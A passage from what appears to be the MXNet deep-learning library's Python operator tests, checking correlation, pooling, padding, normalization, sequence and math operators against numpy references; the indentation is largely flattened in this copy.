        if arg_type1[0] != np.dtype(dtype) or arg_type1[1] != np.dtype(dtype) or out_type1[0] != np.dtype(dtype):
            msg = npt.build_err_msg([a, b],
                                    err_msg="Inferred type from a is not as expected, "
                                            "Expected :%s %s %s, Got: %s %s %s"
                                            % (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
                                    names=['a', 'b'])
            raise AssertionError(msg)
arg_type2, out_type2, _ = corr.infer_type(b=dtype)
        if arg_type2[0] != np.dtype(dtype) or arg_type2[1] != np.dtype(dtype) or out_type2[0] != np.dtype(dtype):
            msg = npt.build_err_msg([a, b],
                                    err_msg="Inferred type from b is not as expected, "
                                            "Expected :%s %s %s, Got: %s %s %s"
                                            % (dtype, dtype, dtype, arg_type2[0], arg_type2[1], out_type2[0]),
                                    names=['a', 'b'])
            raise AssertionError(msg)
for dtype in ['float16', 'float32']:
test_infer_type(dtype)
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 1,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 10,stride1 = 1,stride2 = 2,pad_size = 10,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,6,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,11,11), kernel_size = 5,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 0,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 0,pad_size = 5,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 0,pad_size = 5,is_multiply = True, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 0,stride2 = 1,pad_size = 4,is_multiply = True, dtype = dtype)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(1234)
def test_roipooling():
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
x1 = np.random.rand(4, 3, 12, 8).astype('float32')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'write', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'add', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1E-4)
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
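    # Forward output is compared against np.pad; the gradient is verified numerically.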
# bind with label
X = mx.symbol.Variable('X', dtype=dtype)
Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
# numpy result
pad_grouped = list(zip(*[iter(list(pad_width))] * 2))
np_out = np.pad(x.asnumpy(), pad_grouped, mode)
# mxnet result
grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
exec1 = Y._bind(xpu, args = [x], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0]
# compare numpy + mxnet
assert_almost_equal(out, np_out)
# grad check
check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
def test_pad():
ctx = default_context()
shape1 = (2, 3, 3, 5)
pad1 = (0, 0, 0, 0, 1, 2, 3, 4)
shape2 = (2, 3, 3, 5, 4)
pad2 = (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)
# note: this op doesn't support ints yet. Add tests when supported
dtypes = ["float16", "float32", "float64"]
for dtype in dtypes:
check_pad_with_shape(shape1, ctx, pad1, 'constant', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'edge', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'constant', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'edge', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'reflect', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'reflect', dtype)
def np_instance_norm(data, weight, bias, eps):
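    # Numpy reference for InstanceNorm: normalize each (sample, channel) slice over its spatial dims, then scale by weight and shift by bias.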
spatial_dims = data.shape[2::]
num_spatial_vals = np.prod(np.array(spatial_dims))
scale = 1/float(num_spatial_vals)
sum_axis = tuple(range(2, data.ndim))
mean = scale * np.sum(data, axis = sum_axis)
mean = np.reshape(np.repeat(mean, num_spatial_vals), data.shape)
var = scale * np.sum((data - mean)**2, axis = sum_axis)
var = np.reshape(np.repeat(var, num_spatial_vals), data.shape)
weightBatch = np.tile(weight, (data.shape[0], 1))
weightBatch = np.reshape(np.repeat(weightBatch, num_spatial_vals), data.shape)
biasBatch = np.tile(bias, (data.shape[0], 1))
biasBatch = np.reshape(np.repeat(biasBatch, num_spatial_vals), data.shape)
return weightBatch * (data - mean)/np.sqrt(var + eps) + biasBatch
def check_instance_norm_with_shape(shape, xpu):
# bind with label
eps = 0.001
X = mx.symbol.Variable('X')
G = mx.symbol.Variable('G')
B = mx.symbol.Variable('B')
Y = mx.symbol.InstanceNorm(data=X, beta=B, gamma=G, eps=eps)
x = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
gamma = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
beta = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
np_out = np_instance_norm(x.asnumpy(), gamma.asnumpy(), beta.asnumpy(), eps)
exec1 = Y._bind(xpu, args = {'X':x, 'G':gamma, 'B':beta})
exec1.forward(is_train=False)
out = exec1.outputs[0]
assert_almost_equal(out, np_out, rtol=1e-4, atol=1e-4)
check_numeric_gradient(Y, {'X':x.asnumpy(), 'G':gamma.asnumpy(), 'B':beta.asnumpy()},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
def test_instance_normalization():
check_instance_norm_with_shape((1, 1, 1), default_context())
check_instance_norm_with_shape((2, 1, 2), default_context())
check_instance_norm_with_shape((2,4,5,6), default_context())
check_instance_norm_with_shape((3,3,2,3,2,1,1), default_context())
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
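    # Build the numpy reference for the requested mode ('channel', 'spatial' or 'instance') and check both the forward output and the numeric gradient.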
ctx = default_context()
data = mx.symbol.Variable('data')
out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
# calculate numpy results
if mode == 'channel':
assert in_data.ndim > 2
np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
np_out = np.multiply(in_data, np_norm)
elif mode == 'spatial':
assert in_data.ndim > 2
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
        np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // (s[0] * s[1]), axis=2)
np_out = np.multiply(in_data, np_norm.reshape(s))
elif mode == 'instance':
assert in_data.ndim > 1
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
        np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // s[0], axis=1)
np_out = np.multiply(in_data, np_norm.reshape(s))
else:
raise RuntimeError('Unknown l2 normalization mode')
exe = out._simple_bind(ctx=ctx, data=in_data.shape)
output = exe.forward(is_train=True, data=in_data)
# compare numpy + mxnet
    assert_almost_equal(exe.outputs[0], np_out, rtol=1e-2 if dtype == 'float16' else 1e-5, atol=1e-5)
# check gradient
check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
def test_l2_normalization():
for dtype in ['float16', 'float32', 'float64']:
for mode in ['channel', 'spatial', 'instance']:
nbatch = random.randint(1, 4)
nchannel = random.randint(3, 5)
height = random.randint(4, 6)
check_l2_normalization((nbatch, nchannel, height), mode, dtype)
width = random.randint(5, 7)
check_l2_normalization((nbatch, nchannel, height, width), mode, dtype)
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32,
forward_check_eps=1E-3, backward_check_eps=1E-3,
npy_grad_check=True, finite_grad_check=True):
def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
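        # Numpy reference forward pass: normalize over the given axis and apply gamma/beta broadcast along that axis.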
if axis < 0:
axis += data.ndim
broadcast_shape = [1 for _ in range(data.ndim)]
broadcast_shape[axis] = data.shape[axis]
mean = data.mean(axis=axis, keepdims=True).astype(dtype)
var = data.var(axis=axis, keepdims=True).astype(dtype)
std = np.sqrt(var + dtype(eps)).astype(dtype)
out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
np.reshape(beta, broadcast_shape)
return out
def npy_layer_norm_grad(data, gamma, out_grad, axis, eps):
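        # Numpy reference gradients w.r.t. data, gamma and beta; gamma/beta gradients are reduced over all axes except the normalized one.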
if axis < 0:
axis += data.ndim
exclude_axis = tuple([ele for ele in range(data.ndim) if ele != axis])
data_mean = data.mean(axis=axis, keepdims=True)
data_var = data.var(axis=axis, keepdims=True)
data_std = np.sqrt(data_var + eps)
centered_data = (data - data_mean) / data_std
gamma_grad = (centered_data * out_grad).sum(axis=exclude_axis, keepdims=True)
beta_grad = out_grad.sum(axis=exclude_axis, keepdims=True)
w = out_grad * gamma.reshape([1 if i != axis else data.shape[axis] for i in range(data.ndim)])\
/ data_std
data_grad = w - w.mean(axis=axis, keepdims=True)\
- centered_data * (w * centered_data).mean(axis=axis, keepdims=True)
gamma_grad = gamma_grad.reshape((-1,))
beta_grad = beta_grad.reshape((-1,))
return data_grad, gamma_grad, beta_grad
ctx = default_context()
data = np.random.normal(0, 1, in_shape).astype(dtype)
gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
data_s = mx.symbol.Variable('data')
gamma_s = mx.symbol.Variable('gamma')
beta_s = mx.symbol.Variable('beta')
out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
exe = out_s._simple_bind(ctx, data=in_shape)
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
out_nd = exe.forward()[0]
out = npy_layer_norm(data, gamma, beta, axis, eps)
assert_almost_equal(out, out_nd, forward_check_eps, forward_check_eps)
if finite_grad_check:
for req in ['write', 'add']:
check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
grad_nodes={'data': req, 'gamma': req, 'beta': req},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
if npy_grad_check:
# Test for grad_req = write
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
exe = out_s._simple_bind(ctx, data=in_shape, grad_req='write')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad =\
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(), gt_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(), gt_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(), gt_beta_grad, backward_check_eps, backward_check_eps)
# Test for grad_req = add
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_data_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_gamma_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
init_beta_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
exe = out_s._simple_bind(ctx, data=in_shape, grad_req='add')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.grad_dict['data'][:] = init_data_grad
exe.grad_dict['gamma'][:] = init_gamma_grad
exe.grad_dict['beta'][:] = init_beta_grad
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad = \
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(),
gt_data_grad + init_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(),
gt_gamma_grad + init_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(),
gt_beta_grad + init_beta_grad, backward_check_eps, backward_check_eps)
def test_norm():
try:
import scipy
assert LooseVersion(scipy.__version__) >= LooseVersion('0.1')
from scipy.linalg import norm as sp_norm
except (AssertionError, ImportError):
print("Could not import scipy.linalg.norm or scipy is too old. "
"Falling back to numpy.linalg.norm which is not numerically stable.")
from numpy.linalg import norm as sp_norm
def l1norm(input_data, axis=0, keepdims=True):
return np.sum(abs(input_data), axis=axis, keepdims=keepdims)
def l2norm(input_data, axis=0, keepdims=True):
return sp_norm(input_data, axis=axis, keepdims=keepdims)
ctx = default_context()
data = mx.symbol.Variable('data')
in_data_dim = random_sample([2,3,4], 1)[0]
in_shape = rand_shape_nd(in_data_dim, dim=5)
epsilon = 1e-3
acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64,
np.int32: np.int32, np.int64: np.int64}
dtype_to_str = {np.float16: 'float16', np.float32: 'float32', np.float64: 'float64',
np.int32: 'int32', np.int64: 'int64'}
for enforce_safe_acc in ['1', '0']:
with environment('MXNET_SAFE_ACCUMULATION', enforce_safe_acc):
for order in [1, 2]:
for dtype in [np.float16, np.float32, np.float64]:
for i in range(in_data_dim):
for out_dtype in ['float32', 'float64']:
backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
accumulation_type = acc_type[dtype]
if enforce_safe_acc == "0":
backward_dtype = dtype
out_dtype = dtype_to_str[dtype]
accumulation_type = dtype
skip_backward = 'int' in out_dtype
in_data = np.random.uniform(-1, 1, in_shape).astype(accumulation_type)
in_data[abs(in_data) < epsilon] = 2 * epsilon
norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
                            npy_out = l1norm(in_data, i) if order == 1 else l2norm(in_data, i)
                            npy_out_backward = np.sign(in_data) if order == 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=1e-4 if dtype == np.float16 else 1e-5, ctx=ctx, dtype=dtype)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
dtype=backward_dtype)
# Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
if i < in_data_dim-1:
norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
                                npy_out = l1norm(in_data, (i, i+1)) if order == 1 else l2norm(in_data, (i, i+1))
                                npy_out_backward = np.sign(in_data) if order == 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
rtol=1e-2 if dtype is np.float16 else 1e-3,
atol=1e-4 if dtype is np.float16 else 1e-5, ctx=ctx)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
@pytest.mark.parametrize('enforce_safe_acc', ['1', '0'])
@pytest.mark.parametrize('dtype,forward_check_eps,backward_check_eps,in_shape_l,finite_grad_check_l', [
(np.float16, 1E-2, 1E-2, [(10, 6, 5), (10, 10)], [True, True]),
(np.float32, 1E-3, 1E-3, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False]),
(np.float64, 1E-4, 1E-4, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False])
])
def test_layer_norm(enforce_safe_acc, dtype, forward_check_eps, backward_check_eps,
in_shape_l, finite_grad_check_l):
with environment('MXNET_SAFE_ACCUMULATION', enforce_safe_acc):
for in_shape, finite_grad_check in zip(in_shape_l, finite_grad_check_l):
for axis in range(-len(in_shape), len(in_shape)):
for eps in [1E-2, 1E-3]:
if dtype == np.float16:
npy_grad_check = False
else:
npy_grad_check = True
check_layer_normalization(in_shape, axis, eps, dtype=dtype,
forward_check_eps=forward_check_eps,
backward_check_eps=backward_check_eps,
npy_grad_check=npy_grad_check,
finite_grad_check=finite_grad_check)
# Numpy Implementation of Sequence Ops
def sequence_last_numpy(array, lengths, axis):
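    # Pick the last valid step of each sequence, or the final step of every sequence when lengths is None.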
# create new array of dims [batch, seqlen, ...]
array2 = np.moveaxis(array, axis, 1)
dims = array2.shape
if lengths is None:
return array2[:, -1]
lengths = list(lengths)
return np.array([array2[i, int(lengths[i]) - 1] for i in range(dims[0])])
def sequence_mask_numpy(array, lengths, axis, value):
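    # Overwrite every position at or beyond each sequence's length with the given value.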
if lengths is None:
return array
arrayMask = array.copy()
# conform to [batch, seqlen, ...]
arrayMask = np.moveaxis(arrayMask, axis, 1)
shape = arrayMask.shape
lengths = list(lengths)
for i in range(shape[0]):
arrayMask[i, int(lengths[i]):] = value
return np.moveaxis(arrayMask, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
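    # Reverse only the first lengths[i] steps of each sequence; any padding beyond that stays in place.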
rarray = array.copy()
# conform to [batch, seqlen, ...]
rarray = np.moveaxis(rarray, axis, 1)
shape = rarray.shape
if lengths is None:
lengths = [shape[1]] * shape[0]
lengths = list(lengths)
for i in range(shape[0]):
j = int(lengths[i])
rarray[i,:j] = rarray[i,:j][::-1]
return np.moveaxis(rarray, 1, axis)
def check_sequence_func(ftype, mask_value=0, axis=0):
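    # Compare SequenceLast / SequenceMask / SequenceReverse with the numpy references above, with and without explicit sequence lengths.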
# bind with label
xpu = default_context()
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L') # lengths
shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
for seqlenQ in [True, False]:
for ary_dtype in [np.float32]:
for idx_dtype in [np.int32, np.float32]:
for s in shapes:
x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
batch = s[1] if (axis == 0) else s[0]
seqlen = s[axis]
l_np = np.random.randint(1, seqlen + 1, batch)
l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
if not seqlenQ:
l_np = None
args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
if seqlenQ:
args['sequence_length'] = L
if ftype == "last":
Y = mx.symbol.SequenceLast(**args)
np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
elif ftype == "mask":
args['value'] = mask_value
Y = mx.symbol.SequenceMask(**args)
np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
elif ftype == "reverse":
Y = mx.symbol.SequenceReverse(**args)
np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
fargs = [x, l] if seqlenQ else [x]
gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
numeric_eps=1e-2, rtol=1e-2)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@pytest.mark.skip(reason="Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
check_sequence_func("last", axis=0)
check_sequence_func("last", axis=1)
def test_sequence_mask():
check_sequence_func("mask", axis = 0, mask_value=-2.3)
check_sequence_func("mask", axis = 1, mask_value=0.3)
def check_sequence_reverse(xpu):
# sample data
arr = np.array(
[[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr1 = np.array(
[[[ 13., 14., 15.],
[ 16., 17., 18.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]]])
arr2 = np.array(
[[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr3 = np.array(
[[[ 7., 8., 9.],
[ 16., 17., 18.]],
[[ 1., 2., 3.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 4., 5., 6.]]])
# test for matrix case
seq_len_1 = [1, 2, 2]
arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)
def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
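        # Run SequenceReverse on arr and return the result as a numpy array.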
# MxNet symbol creation
seq = mx.sym.Variable('seq')
if sequence_length and use_sequence_length:
seq_len = mx.sym.Variable('seq_len')
else:
# ensure that both are disabled, not just one
seq_len=None
use_sequence_length=False
rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
# MxNet symbol execution
if sequence_length:
bound = rev._bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
else:
bound = rev._bind(xpu, {'seq': mx.nd.array(arr)})
fwd = bound.forward()
return fwd[0].asnumpy()
# test cases
assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
def test_sequence_reverse():
check_sequence_func("reverse", axis=0)
check_sequence_reverse(mx.cpu())
def mathematical_core_binary(name,
forward_mxnet_call,
forward_numpy_call,
backward_numpy_call1,
backward_numpy_call2,
data1_init=2.,
data2_init=3.,
grad_init=2.):
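    # Check a binary element-wise op: the forward result against forward_numpy_call and each input gradient against its backward callback.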
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3, 4)
data_tmp2 = np.random.rand(3, 4)
data_tmp1[:] = data1_init
data_tmp2[:] = data2_init
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = forward_mxnet_call(data1, data2)
exe_test = test._bind(default_context(), args=[arr_data1, arr_data2], args_grad=[arr_grad1, arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp1, data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = grad_init
npout_grad1 = npout_grad * backward_numpy_call1(data_tmp1, data_tmp2)
npout_grad2 = npout_grad * backward_numpy_call2(data_tmp1, data_tmp2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
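    # Check a unary element-wise op: the forward result against forward_numpy_call and the input gradient against backward_numpy_call.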
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = forward_mxnet_call(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
npout_grad = out_grad.asnumpy()
temp = backward_numpy_call(data_tmp)
npout_grad = npout_grad * temp
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
# erf
mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
# erfinv
mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
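    # Forward-only check for rounding-style ops; no gradient is verified here.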
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
test = forward_mxnet_call(data)
exe_test = test._bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
def test_mathematical():
# rsqrt
mathematical_core("rsqrt",
lambda x: mx.sym.rsqrt(x),
lambda x: 1 / np.sqrt(x),
lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
# tan
mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
# arcsin
mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
# arccos
mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
# arctan
mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
# hypot
mathematical_core_binary("hypot",
lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
0.5, 0.5, 0.5)
# hypot scalar
mathematical_core("hypot scalar",
lambda x: mx.sym.hypot(x, 3),
lambda x: np.hypot(x, 3),
lambda x: x / np.hypot(x, 3),
0.5, 0.5)
# degrees
mathematical_core("degrees",
lambda x: mx.sym.degrees(x),
lambda x: np.degrees(x),
lambda x: 180./np.pi,
0.5, 0.5)
# radians
mathematical_core("radians",
lambda x: mx.sym.radians(x),
lambda x: np.radians(x),
lambda x: np.pi / 180.,
0.6, 1)
# sinh
mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
# cosh
mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
# tanh
mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
# arcsinh
mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
lambda x: 1./(x**2 + 1.)**(1./2.))
# arccosh
mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
lambda x: 1./(x**2 - 1.)**(1./2.))
# arctanh
